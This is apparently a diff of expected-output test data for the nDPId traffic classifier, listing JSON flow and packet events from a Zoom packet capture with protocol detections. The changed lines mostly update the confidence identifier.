00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471915,"flow_last_seen":1569520471915,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471915,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1569520471915,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":1569520471915,"pkt":"EBMx8Tl2KDc3AG3ICABFAACHOsEAAEARb8bAqAF1bV6gY+zMImEAcx+TAQACgEJ0mpHOZDa3wq7Yfnt8kAAAAAAAAAACAHoA0QB6ANEAAABAz+pIvn76v2yDYA2gAvW2g1TH36+BBcgmmBwGC4A2voI37csLDeuB1cbZ5dS3SDby7ZAjUH7\/6+f4krtKebNFkQAAAAA="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471915,"flow_last_seen":1569520471915,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471915,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471915,"flow_last_seen":1569520471915,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471915,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1569520471939,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1569520471939,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA\/uqdAADURuydtXqBjwKgBdSJh7MwAK7AuAgABgEJ0mpHOZDa3wq7Yfnt8kABaDj8AegDRAAAAAAAAAAA="} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1569520471939,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1569520471939,"pkt":"KDc3AG3IEBMx8Tl2CABFAAApuqhAADURuzxtXqBjwKgBdSJh7MwAFUSkAwAAAAF2Ko4UAFoOPwAAAAAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520473084,"flow_last_seen":1569520473084,"flow_idle_time":200000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520473084,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1569520473084,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1569520473084,"pkt":"EBMx8Tl2KDc3AG3ICABFAACJ4\/YAAEARxo7AqAF1bV6gY\/EjImEAde5DAQACOkSxT2rBSy0CI5EJ7ghSoQAAAAAAAAACAHoFYgB6BWIAAABAyr1YPP8KZ34wUqB9PR5Zle\/sBvgfAfGBqNzDFPjrnryOYaOvAtAdhsk5Sd978V5OWjrnwByNSAVBXX+sDOwgiv\/\/\/\/8KAA=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520473084,"flow_last_seen":1569520473084,"flow_idle_time":200000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520473084,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520473084,"flow_last_seen":1569520473084,"flow_idle_time":200000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520473084,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1569520473116,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1569520473116,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA\/vWBAADURuG5tXqBjwKgBdSJh8SMAK0WqAgABOkSxT2rBSy0CI5EJ7ghSoQBaDkQAegViAAAAAAAAAAA="} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1569520473116,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1569520473116,"pkt":"KDc3AG3IEBMx8Tl2CABFAAApvWFAADURuINtXqBjwKgBdSJh8SMAFalIAwAAAAF2KpKmAFoORAAAAAAA"} -00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469423,"flow_last_seen":1569520469433,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469423,"flow_last_seen":1569520469433,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466080,"flow_last_seen":1569520472536,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":796,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1569520473084,"flow_last_seen":1569520473198,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":318,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1569520473084,"flow_last_seen":1569520473198,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":318,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1569520468959,"flow_last_seen":1569520469430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7299,"flow_avg_l4_payload_len":405,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520469950,"flow_last_seen":1569520470454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":17285,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1569520470022,"flow_last_seen":1569520470628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":19889,"flow_avg_l4_payload_len":602,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469221,"flow_last_seen":1569520469399,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469189,"flow_last_seen":1569520469375,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} -00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469253,"flow_last_seen":1569520469433,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1569520468959,"flow_last_seen":1569520469430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7299,"flow_avg_l4_payload_len":405,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520469950,"flow_last_seen":1569520470454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":17285,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1569520470022,"flow_last_seen":1569520470628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":19889,"flow_avg_l4_payload_len":602,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469221,"flow_last_seen":1569520469399,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469189,"flow_last_seen":1569520469375,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 